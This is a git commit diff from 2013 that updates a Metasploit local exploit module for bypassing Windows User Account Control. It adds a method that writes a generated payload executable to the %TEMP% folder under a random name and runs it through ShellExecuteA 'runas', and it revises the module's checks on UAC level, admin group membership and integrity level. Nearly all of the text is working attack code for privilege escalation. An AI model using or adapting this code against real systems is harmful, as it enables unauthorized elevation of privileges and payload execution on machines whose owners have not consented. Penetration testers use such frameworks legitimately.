Update bypassuac_injection inline with latest privs lib

bug/bundler_fix
Meatballs 2013-10-23 21:15:41 +01:00
parent e6a2a1006f
commit 6fdf5cab15
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 31 additions and 21 deletions

View File

@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::EXE
include Post::Common
include Post::File
include Post::Windows::Priv
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
end
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
#
# Verify use against Vista+
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
end
if is_uac_enabled?
vprint_status "UAC is Enabled, checking level..."
print_status "UAC is Enabled, checking level..."
else
fail_with(Exploit::Failure::NotVulnerable,
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
)
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
case get_uac_level
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UACDefault
print_good "UAC is set to Default"
vprint_status "BypassUAC can bypass this setting, continuing..."
when UACNoPrompt
fail_with(Exploit::Failure::NotVulnerable,
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
)
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..."
when UAC_NO_PROMPT
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
runas_method
return
end
# Check if you are an admin
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
if admin_group
print_good('Part of Administrators group! Continuing...')
else
print_error('Not in admins group, cannot escalate with this module')
print_error('Exiting...')
return
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end
if get_integrity_level == LowIntegrityLevel
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
end